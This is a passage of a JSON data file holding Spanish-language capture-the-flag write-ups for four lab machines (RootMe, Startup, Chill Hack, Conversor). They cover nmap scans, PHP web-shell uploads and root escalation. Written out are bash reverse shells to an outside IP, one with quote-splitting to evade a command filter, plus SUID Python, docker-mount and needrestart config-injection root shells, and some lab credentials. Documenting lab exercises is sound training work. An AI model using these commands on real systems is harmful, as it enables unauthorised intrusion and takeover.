      "assets/notion-writeups/basic-pentesting/captura-04.png",
      "assets/notion-writeups/basic-pentesting/captura-05.png",
      "assets/notion-writeups/basic-pentesting/captura-06.png",
      "assets/notion-writeups/basic-pentesting/captura-07.png",
      "assets/notion-writeups/basic-pentesting/captura-08.png",
      "assets/notion-writeups/basic-pentesting/captura-09.png",
      "assets/notion-writeups/basic-pentesting/captura-10.png",
      "assets/notion-writeups/basic-pentesting/captura-11.png",
      "assets/notion-writeups/basic-pentesting/captura-12.png",
      "assets/notion-writeups/basic-pentesting/captura-13.png",
      "assets/notion-writeups/basic-pentesting/captura-14.png",
      "assets/notion-writeups/basic-pentesting/captura-15.png",
      "assets/notion-writeups/basic-pentesting/captura-16.png",
      "assets/notion-writeups/basic-pentesting/captura-17.png",
      "assets/notion-writeups/basic-pentesting/captura-18.png",
      "assets/notion-writeups/basic-pentesting/captura-19.png",
      "assets/notion-writeups/basic-pentesting/captura-20.png",
      "assets/notion-writeups/basic-pentesting/captura-21.png",
      "assets/notion-writeups/basic-pentesting/captura-22.png",
      "assets/notion-writeups/basic-pentesting/captura-23.png"
    ]
  },
  "rootme": {
    "titulo": "RootMe",
    "plataforma": "TryHackMe",
    "dificultad": "Fácil",
    "foco": [
      "Upload",
      "Reverse shell",
      "SUID"
    ],
    "resumen": "Fuzzing, subida de shell, reverse shell y escalada mediante Python con SUID.",
    "texto": "RootMe\nConexion \n1.- Prendemos la VPN , que nos dio nuestra cuenta de TRYHACME\n2.- Prendemos la maquina ,donde nos da una IP ——— > 10.67.189.7\n3.- Ponemos el comando : sudo nano /etc/hosts \nEn nuestra maquina y agregamos :\nLa IP   = 10.67.189.7\nEl dominio  = RootMe.thm\n4.-  Hacemos el comando ping -c 1 10.67.189.7 \nDonde nos da la conexion exitosa \nReconocimiento\n1. - Ponemos el comando :\nnmap --open --min-rate=5000 -T5 -sV -sC -Pn -p- 10.67.189.7\nDonde nos muestra los puertos abiertos :\n22 SSH ( OpenSSH 8.2p1 )\n80 HTTP (Apache 2.4.41) \nExplotacion\n1.- Ingresamos a la interfaz pero no encontramos nada interesante\n2.- Entonces lo que haremos sera Fuzeear la pagina donde encontramos directorios como : ( uploads , panel , css, js )\n3.- Ingresamos al directorio panel , y vemos que es una web donde nos sirve para subir archivos\n4.-Ingresamos al directorio uploads , y vemos que es una web donde vemos archivos subidos de la pagina\n5.- Entonces lo que haremos sera subir un archivo reverse SHELL PHP \n6.- Vemos que no permite subir un archivo PHP \n7.- Entonces subiremos el archivo en formato PHAR , donde obtenemos exito\n8.- Abrimos el puerto 4444\n9.- Vamos a uploads y ejecutamos el archivo PHP, donde obtenemos una reverse shell , en nuestro puerto de escucha\nEscala de privlegios\n1.- Vemos los archivos STUID , y vemos un archivo interesante \n/usr/bin/python\n2.- Donde poniendo el comando : \n/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'\nIngresamos a root",
    "imagenes": [
      "assets/notion-writeups/rootme/captura-01.png",
      "assets/notion-writeups/rootme/captura-02.png",
      "assets/notion-writeups/rootme/captura-03.png",
      "assets/notion-writeups/rootme/captura-04.png",
      "assets/notion-writeups/rootme/captura-05.png",
      "assets/notion-writeups/rootme/captura-06.png",
      "assets/notion-writeups/rootme/captura-07.png",
      "assets/notion-writeups/rootme/captura-08.png",
      "assets/notion-writeups/rootme/captura-09.png",
      "assets/notion-writeups/rootme/captura-10.png",
      "assets/notion-writeups/rootme/captura-11.png",
      "assets/notion-writeups/rootme/captura-12.png",
      "assets/notion-writeups/rootme/captura-13.png",
      "assets/notion-writeups/rootme/captura-14.png",
      "assets/notion-writeups/rootme/captura-15.png",
      "assets/notion-writeups/rootme/captura-16.png",
      "assets/notion-writeups/rootme/captura-17.png",
      "assets/notion-writeups/rootme/captura-18.png"
    ]
  },
  "startup": {
    "titulo": "Startup",
    "plataforma": "TryHackMe",
    "dificultad": "Fácil",
    "foco": [
      "FTP",
      "PCAP",
      "Cron"
    ],
    "resumen": "FTP anónimo, shell inicial, análisis de captura y escalada mediante script.",
    "texto": "Startup\nConexion \n1.- Prendemos la VPN , que nos dio nuestra cuenta de TRYHACME\n2.- Prendemos la maquina ,donde nos da una IP ——— > 10.64.140.47\n3.- Ponemos el comando : sudo nano /etc/hosts \nEn nuestra maquina y agregamos :\nLa IP   = 10.64.140.47\nEl dominio  = Startup.thm\n4.-  Hacemos el comando ping -c 1 10.64.140.47 \nDonde nos da la conexion exitosa \nReconocimiento\n1. - Ponemos el comando :\nnmap --open --min-rate=5000 -T5 -sV -sC -Pn -p- 10.64.140.47\nDonde nos muestra los puertos abiertos :\n21 , version ( vsftpd 3.0.3 ) —- Login anónimo permitido \n22 , version ( Open 7.2p2 )\n80 , version ( Apache httpd 2.4.18 )\nExplotacion\n1.- Como vemos que el protocolo FTP , esta permitido en anonymous ingresamos \n2.- Nos descargamos los dos archivos interesantes\n3.-  Vemos los archivos  deduciendo : \nHay un usuario llamado Maya\nNo encontramos nada relevante en la imagen \n4.- Hacemos Fuzzing y encontramos este directorio\n5.-  Donde si Fuzzeamos vemos los archivos de protocolo FTP\n6.- Entonces lo que podemos hacer es subir un archivo reverse PHP, en el protocolo FTP y abrirlo en la pagina para obtener la reverse SHELL\nSubimos el archivo Reverse PHP\n7.- Abrimos un puerto 4444\n8.-  Ingresamos a la pagina recargamos y vemos el archivo “ shell.php “ , le damos en ENTER y en nuestro puerto de escucha nos da una reverse SHELL\n9.- Ingresamos al directorio “ incidents “ , y vemos un archivo interesante formato :\npcapng\n10.- Descargamos el archivo en nuestra maquina \n11.- Abrimos el archivo , donde investigando en “ tcp.stream eq 7 “\nEncontre una conversacion , donde nos da  la contraseña : c4ntg3t3n0ughsp1c3\n12.- Aprovechamos esa contraseña y ingresamos al usuario lennie\nEscala de privlegios\n1.- Investigamos en las carpetas de “ lennie “ y encontramos un script que nos permite ser root\n2.- Ejecutamos el comando : \necho \"bash -i >& /dev/tcp/192.168.167.97/4445 0>&1\" > /etc/print.sh\nLa Inyección: Al usar echo \"bash -i >& /dev/tcp/192.168.167.97/4445 0>&1\" > /etc/print.sh, borraste el contenido original de print.sh y lo reemplazaste por una Bash Reverse Shell.\nDonde obtenemos root",
    "imagenes": [
      "assets/notion-writeups/startup/captura-01.png",
      "assets/notion-writeups/startup/captura-02.png",
      "assets/notion-writeups/startup/captura-03.png",
      "assets/notion-writeups/startup/captura-04.png",
      "assets/notion-writeups/startup/captura-05.png",
      "assets/notion-writeups/startup/captura-06.png",
      "assets/notion-writeups/startup/captura-07.png",
      "assets/notion-writeups/startup/captura-08.png",
      "assets/notion-writeups/startup/captura-09.png",
      "assets/notion-writeups/startup/captura-10.png",
      "assets/notion-writeups/startup/captura-11.png",
      "assets/notion-writeups/startup/captura-12.png",
      "assets/notion-writeups/startup/captura-13.png",
      "assets/notion-writeups/startup/captura-14.png",
      "assets/notion-writeups/startup/captura-15.png",
      "assets/notion-writeups/startup/captura-16.png",
      "assets/notion-writeups/startup/captura-17.png",
      "assets/notion-writeups/startup/captura-18.png",
      "assets/notion-writeups/startup/captura-19.png",
      "assets/notion-writeups/startup/captura-20.png",
      "assets/notion-writeups/startup/captura-21.png",
      "assets/notion-writeups/startup/captura-22.png",
      "assets/notion-writeups/startup/captura-23.png",
      "assets/notion-writeups/startup/captura-24.png",
      "assets/notion-writeups/startup/captura-25.png",
      "assets/notion-writeups/startup/captura-26.png"
    ]
  },
  "chill-hack": {
    "titulo": "Chill Hack",
    "plataforma": "TryHackMe",
    "dificultad": "Medio",
    "foco": [
      "Bypass",
      "MySQL",
      "Docker"
    ],
    "resumen": "FTP anónimo, consola restringida, bypass, credenciales internas y escalada con Docker.",
    "texto": "Chill Hack\nConexion \n1.- Prendemos la VPN , que nos dio nuestra cuenta de TRYHACME\n2.- Prendemos la maquina ,donde nos da una IP ——— > 10.67.135.6\n3.- Ponemos el comando : sudo nano /etc/hosts \nEn nuestra maquina y agregamos :\nLa IP   = 10.67.135.6 \nEl dominio  = chill.thm\n4.-  Hacemos el comando ping -c 1 10.67.135.6 \nDonde nos da la conexion exitosa \nReconocimiento\n1. - Ponemos el comando :\nnmap --open --min-rate=5000 -T5 -sV -sC -Pn -p- 10.67.135.6\nDonde nos muestra los puertos abiertos :\n21 , version ( vsftpd 3.0.5 ) —- anonymous\n22 , version ( Open 8.2p1 )\n80 , version ( Apache httpd 2.4.41 )\nExplotacion 1\n1.-  Ingresamos al protocolo FTP , con ayuda del usuario “ anonymous “ , donde vemos un archivo interesante \n2.- Descargamos el archivo \n3.- Al leer nos dice que hay una Funcion donde omite ciertos caractereres\n4.- Ingresamos a la pagina y no vemos nada interesante\n5.- Entonces lo que haremos sera Fuzzear la pagina donde encontramos varios directorios interesantes\n6.- Donde investigando encontramos muchos directorios Interesantes\n7.- Pero el mas intersante fue  “ secret “ , donde es una pagina Web tipo consola\n8.- Al poner el comando ( nc ,ls , bash,sh .. etc ) ,Se observaba que tenia restricciones\n9.- Pero habia comandos donde no tenia restricciones y era la el comando “ whoami “\n10.- El truco de la variable vacía (Bypass de strings) :\nProbamos este comando , obteniendo acceso:\nb''a''s''h -c 'b''a''s''h -i >& /dev/tcp/192.168.167.97/4444 0>&1'\n11.- Ponemos el comando “ sudo -l “ y vemos que nos permite acceder a otro usuario\n12.- Observamos el comando y vemos que ejecutando el comando \nsudo -u apaar /home/apaar/.helpline.sh\ntest\n/bin/bash \nObtenemos acceso\n12.- Invesgamos bien estas vulnerabilidades pero vemos que esta bien parchada\n13.- Investigamos ahora el archivo “ index.php “ , vemos :\nBase de Datos: webportal\nUsuario DB: root\nContraseña DB: !@m+her00+@db\n14.- Ingresamos a la base de datos\n15.- Investigamos la base de datos con los comandos : \nshow databases; \nuse webportal;\nshow tables;\nselect * from users;\nDonde encontramos dos credenciales : \nAnurodh :  masterpassword\nApaar :  dontaskdonttell\nExplotacion 2\n1.- Ingresamos ahora al directorio “ images “ donde vemos archivos interesantes pero el más relevante el archivo JPG \n2.- Descargando el archivo a nuestra maquina \n3.- Vemos que hemos estraido un archivo “ backup.zip “, entonces pasaremos a cambiar el fortamos .jpg.out a backup.zip\n4.- Vemos que al intentar ingresar nos pide la contraseña el archivo\n5.- Intentamos romper la contraseña de Zip obteniendo exito\n6.- Ingresamos donde obtenemos un archivo interesante \n7.- Lo abrimos y nos da como un archivo encriptado en base64 :\n8.- Donde efectivamente era de base64, obteniendo con codificacion :\n!d0ntKn0wmYp@ssw0rd\nViendo tambien que el usuario es : Anurodh\n9.- Donde ingresamos al usuario “ anurodh “ \nEscala de privlegio \n1.- Vemos el archivo tiene una vulnerabilidad docker \n2.- Ejectuamos el comando :\ndocker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh\nDonde nos da la root\nNos guiamos del documento GTFBINS",
    "imagenes": [
      "assets/notion-writeups/chill-hack/captura-01.png",
      "assets/notion-writeups/chill-hack/captura-02.png",
      "assets/notion-writeups/chill-hack/captura-03.png",
      "assets/notion-writeups/chill-hack/captura-04.png",
      "assets/notion-writeups/chill-hack/captura-05.png",
      "assets/notion-writeups/chill-hack/captura-06.png",
      "assets/notion-writeups/chill-hack/captura-07.png",
      "assets/notion-writeups/chill-hack/captura-08.png",
      "assets/notion-writeups/chill-hack/captura-09.png",
      "assets/notion-writeups/chill-hack/captura-10.png",
      "assets/notion-writeups/chill-hack/captura-11.png",
      "assets/notion-writeups/chill-hack/captura-12.png",
      "assets/notion-writeups/chill-hack/captura-13.png",
      "assets/notion-writeups/chill-hack/captura-14.png",
      "assets/notion-writeups/chill-hack/captura-15.png",
      "assets/notion-writeups/chill-hack/captura-16.png",
      "assets/notion-writeups/chill-hack/captura-17.png",
      "assets/notion-writeups/chill-hack/captura-18.png",
      "assets/notion-writeups/chill-hack/captura-19.png",
      "assets/notion-writeups/chill-hack/captura-20.png",
      "assets/notion-writeups/chill-hack/captura-21.png",
      "assets/notion-writeups/chill-hack/captura-22.png",
      "assets/notion-writeups/chill-hack/captura-23.png",
      "assets/notion-writeups/chill-hack/captura-24.png",
      "assets/notion-writeups/chill-hack/captura-25.png",
      "assets/notion-writeups/chill-hack/captura-26.png",
      "assets/notion-writeups/chill-hack/captura-27.png",
      "assets/notion-writeups/chill-hack/captura-28.png",
      "assets/notion-writeups/chill-hack/captura-29.png",
      "assets/notion-writeups/chill-hack/captura-30.png",
      "assets/notion-writeups/chill-hack/captura-31.png",
      "assets/notion-writeups/chill-hack/captura-32.png",
      "assets/notion-writeups/chill-hack/captura-33.png",
      "assets/notion-writeups/chill-hack/captura-34.png",
      "assets/notion-writeups/chill-hack/captura-35.png",
      "assets/notion-writeups/chill-hack/captura-36.png",
      "assets/notion-writeups/chill-hack/captura-37.png",
      "assets/notion-writeups/chill-hack/captura-38.png",
      "assets/notion-writeups/chill-hack/captura-39.png",
      "assets/notion-writeups/chill-hack/captura-40.png",
      "assets/notion-writeups/chill-hack/captura-41.png"
    ]
  },
  "conversor": {
    "titulo": "Conversor",
    "plataforma": "Hack The Box",
    "dificultad": "Medio",
    "foco": [
      "XSLT",
      "Cron",
      "needrestart"
    ],
    "resumen": "Registro web, análisis de código fuente, abuso de XML/XSLT, cron y needrestart.",
    "texto": "Conversor\nConexion\n1.- Prendemos la VPN , que nos dio nuestra cuenta de HTB \n2.- Prendemos la maquina ,donde nos da una IP ——— > 10.129.9.99 \n3.- Ponemos el comando : sudo nano /etc/hosts \nEn nuestra maquina y agregamos :\nLa IP   = 10.129.9.99 \nEl dominio  = conversor.htb\n4.-  Hacemos el comando ping -c 1 10.129.9.99  \nDonde nos da la conexion exitosa \nReconocimiento\n1. - Ponemos el comando :\nnmap --open --min-rate=5000 -T5 -sV -sC -Pn -p- 10.129.9.99\nDonde nos muestra los puertos abiertos :\n22 ,version (OpenSSH 8.9p1 (Ubuntu 3ubuntu0.13))\n80 ,version  (Apache 2.4.52 ) \nExplotacion\n1.- Ingresamos a la WEB y tenemos un Login , donde podemos registrarnos tambien\n2.- Una vez registrados, ingremos a nuestra cuenta y vemos que tenemos una interfaz donde podemos subir un archivo XML y XSLT\n3.- Si ponemos en “ About “, podemos ver que hay un archivo para descargar donde procederemos a descargarlo\n4.- Descomprimimos el archivo “ source_code.tar.gz “ ,obteniendo muchos archivos\n5.- Vemos el archivo  “ app.py “  ,concluyendo :\n El servidor no entiende PHP\nNecesito inyectar código Python o usar funciones nativas de la librería XML que soporte Python\nTengo las llaves del reino Lo que vi:  app.secret_key = 'Changemeplease', esta es una vulnerabilidad crítica de configuración. La seguridad de las sesiones depende de este secreto.\n6.- Vemos una base de datos ,concluyendo :\nAbrimos la base de datos \nListamos las tablas disponibles\nExtraemos los usuarios y contraseñas ( pero menos que no podemos ver nada )\n7.- Vemos el Install.md ,concluyendo :\nOservamos que tenemos : \n* * * * * www-data for f in /var/www/conversor.htb/scripts/*.py; do python3 \"$f\"; done\nDonde el servidor dice \"Cada 60 segundos, buscaré cualquier script de Python en esta carpeta y lo ejecutaré sin hacer preguntas”\n8.-  Al ver el Cron Job (install.md) y saber que el backend es Python(app.py), deducimos nuestra única vía de ataque posible:\nEl Cron Job donde actúa como un \"Ejecutor Automático\". Si logramos poner un archivo ahí, el sistema lo ejecutará por nosotros.\nusaremos el XSLT para CREAR un archivo con las siguientes características obligatorias dictadas por install.md :\nRuta: Debe ser /var/www/conversor.htb/scripts/.\nExtensión: Debe ser .py (para que el Cron lo reconozca).\nContenido: Debe ser código Python \n A) Creamos el Archivo Gatillo\nFunción: Actuar como un contenedor de datos válido para que el servidor acepte procesar nuestra solicitud.\nB) Creamos el Archivo Payload\nFunción: Inyectar el código malicioso en el servidor aprovechando la librería exsl.\nResultado Esperado:\nAl subir ambos archivos y dar a \"Convert\", el servidor creará silenciosamente el archivo hack.py. Solo restará esperar el minuto siguiente para que el Cron Job lo ejecute y nos devuelva la conexión.\n10.- Entoncemos procederemos a abrir un puerto y colocar los archivos que creamos\n11.- Donde al darle en “ Convert “ , nos recarga la pagina y en nuestra puerto de escucha nos da una REVERSE\n12.- Buscamos en nuestra base de datos  donde vemos que tenemos dos usuarios , pero el que más nos interesa es el usuario “ fismathack “ , entonces vemos que su contraseña puede estar hasheada\n13.- Donde efectivamente vemos que nuestra contraseña esta Encriptada teniendo como resultado —— > “ Keepmesafeandwarm “ \nIngresando con exito a usuario “ fismathack “ \nEscala de Privilegios\n1.- Hacemos un sudo -l , donde vemos que tenemos un binario \n/usr/bin/needrestart\n2.- Investigamos su version del binario \nPodemos usar la técnica de Inyección de archivo de configuración\n¿Por qué funciona esto?\nneedrestart está escrito en Perl, y su opción -c permite cargar un archivo de configuración externo. Lo interesante es que needrestart \"lee\" la configuración ejecutándola como código Perl.\nSi creamos un archivo de configuración falso con un comando de sistema dentro y se lo pasas a needrestart como root, ese comando se ejecutará como root.\n3.-   \nVamos a crear un archivo de configuración malicioso que simplemente le diga al sistema que ejecute una shell /bin/bash : \necho 'exec(\"/bin/bash\");' > /tmp/exploit.conf\n- Ejecutamos needrestart cargando la configuración:\nsudo /usr/sbin/needrestart -c /tmp/exploit.conf",
    "imagenes": [
      "assets/notion-writeups/conversor/captura-01.png",
      "assets/notion-writeups/conversor/captura-02.png",
      "assets/notion-writeups/conversor/captura-03.png",
      "assets/notion-writeups/conversor/captura-04.png",
      "assets/notion-writeups/conversor/captura-05.png",
      "assets/notion-writeups/conversor/captura-06.png",
      "assets/notion-writeups/conversor/captura-07.png",
      "assets/notion-writeups/conversor/captura-08.png",
      "assets/notion-writeups/conversor/captura-09.png",
      "assets/notion-writeups/conversor/captura-10.png",
      "assets/notion-writeups/conversor/captura-11.png",
      "assets/notion-writeups/conversor/captura-12.png",
      "assets/notion-writeups/conversor/captura-13.png",
      "assets/notion-writeups/conversor/captura-14.png",
      "assets/notion-writeups/conversor/captura-15.png",
      "assets/notion-writeups/conversor/captura-16.png",
      "assets/notion-writeups/conversor/captura-17.png",
      "assets/notion-writeups/conversor/captura-18.png",
      "assets/notion-writeups/conversor/captura-19.png",
      "assets/notion-writeups/conversor/captura-20.png",
      "assets/notion-writeups/conversor/captura-21.png",
      "assets/notion-writeups/conversor/captura-22.png",
      "assets/notion-writeups/conversor/captura-23.png",
      "assets/notion-writeups/conversor/captura-24.png",
      "assets/notion-writeups/conversor/captura-25.png",
      "assets/notion-writeups/conversor/captura-26.png",
      "assets/notion-writeups/conversor/captura-27.png",
      "assets/notion-writeups/conversor/captura-28.png",
      "assets/notion-writeups/conversor/captura-29.png"
    ]
  }
};
